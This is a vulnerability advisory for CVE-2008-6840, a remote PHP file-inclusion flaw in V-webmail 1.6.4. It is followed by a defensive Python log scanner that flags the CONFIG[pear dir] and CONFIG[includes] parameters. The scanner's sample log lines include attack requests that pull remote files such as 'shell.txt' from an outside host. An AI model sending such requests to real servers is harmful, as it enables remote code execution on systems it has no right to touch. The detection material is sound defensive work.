PT-2009-2309 · V Webmail · V-Webmail

Published: 2009-07-01 · Updated: 2017-08-17 · CVE-2008-6840

CVSS v2.0: 6.8 (Medium) · Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
Name of the Vulnerable Software and Affected Versions: V-webmail version 1.6.4
Description: The issue allows remote attackers to execute arbitrary PHP code by supplying a URL in specific parameters. The CONFIG[pear dir] parameter is vulnerable in multiple files, including Mail/RFC822.php, Net/Socket.php, XML/Parser.php, XML/Tree.php, Mail/mimeDecode.php, Console/Getopt.php, System.php, Log.php, File.php, includes/prepend.php, and includes/cachedConfig.php. Additionally, the CONFIG[includes] parameter in prepend.php and email.list.search.php is also affected.
Recommendations: For V-webmail version 1.6.4, consider disabling the CONFIG[pear dir] and CONFIG[includes] parameters in the affected files until a patch is available. Restrict access to the vulnerable files in the includes/pear/ and includes/ directories to minimize the risk of exploitation. Avoid using the CONFIG[pear dir] parameter in the affected API endpoints until the issue is resolved.
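The description names two request parameters, CONFIG[pear dir] and CONFIG[includes], that a client has no legitimate reason to set; when their value is a URL, the request is a remote-include attempt of the kind described. The following is an added detection example, not code from this advisory or from the V-webmail project: it scans web-server access-log lines for those parameters and reports every occurrence, separating a URL value (remote include) from a local path override. The combined-style log format, the sample log lines, and the treatment of "pear dir" and "pear_dir" as the same key are assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Parameters only the application itself should set. A client supplying them is
# tampering with include paths. Assumption: the advisory writes "pear dir" while
# the real key may use an underscore, so both spellings normalise to one form.
SUSPECT_PARAMS = {"config[pear dir]", "config[includes]"}

# A value that starts with a URL scheme means a remote include (the CVE-2008-6840 case).
REMOTE_SCHEME = re.compile(r"^\s*[a-z][a-z0-9+.-]*://", re.IGNORECASE)

# Minimal parser for a combined-style access log line: client, method, target, status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def normalise_key(key):
    """Lower-case the parameter name and treat '_' and ' ' as the same character."""
    return key.strip().lower().replace("_", " ")


def classify_request(client, target):
    """Return one finding per suspect parameter present in the request target."""
    parts = urlsplit(target)
    findings = []
    # parse_qsl percent-decodes, so CONFIG%5Bpear_dir%5D becomes CONFIG[pear_dir].
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if normalise_key(key) not in SUSPECT_PARAMS:
            continue
        verdict = "remote_include" if REMOTE_SCHEME.match(value) else "config_override"
        findings.append({
            "client": client,
            "path": parts.path,
            "param": key,
            "value": value,
            "verdict": verdict,
        })
    return findings


def scan_log(lines):
    """Run classify_request over every parseable log line; skip lines that do not parse."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            findings.extend(classify_request(m["client"], m["target"]))
    return findings


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jul/2009:10:15:32 +0000] "GET /includes/pear/Mail/RFC822.php'
    '?CONFIG%5Bpear_dir%5D=http%3A%2F%2F198.51.100.7%2Fx.txt%3F HTTP/1.1" 200 512',
    '198.51.100.20 - - [01/Jul/2009:10:16:01 +0000] "GET /email.list.php?page=2&sort=date HTTP/1.1" 200 4096',
    '203.0.113.5 - - [01/Jul/2009:10:16:40 +0000] "GET /includes/prepend.php'
    '?CONFIG[includes]=https://198.51.100.7/shell.txt HTTP/1.1" 200 300',
    '203.0.113.9 - - [01/Jul/2009:10:17:12 +0000] "GET /index.php?CONFIG[includes]=../../includes/ HTTP/1.1" 404 221',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['verdict']:16} {f['client']:14} {f['path']}  {f['param']}={f['value']}")
```

Any hit is worth an alert, since these keys never appear in legitimate requests; the remote_include verdict is the one that matches the advisory's code-execution scenario, while config_override still indicates probing of the same weakness.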

Exploit · Fix · Code Injection


Weakness Enumeration

Related Identifiers: CVE-2008-6840

Affected Products: V-Webmail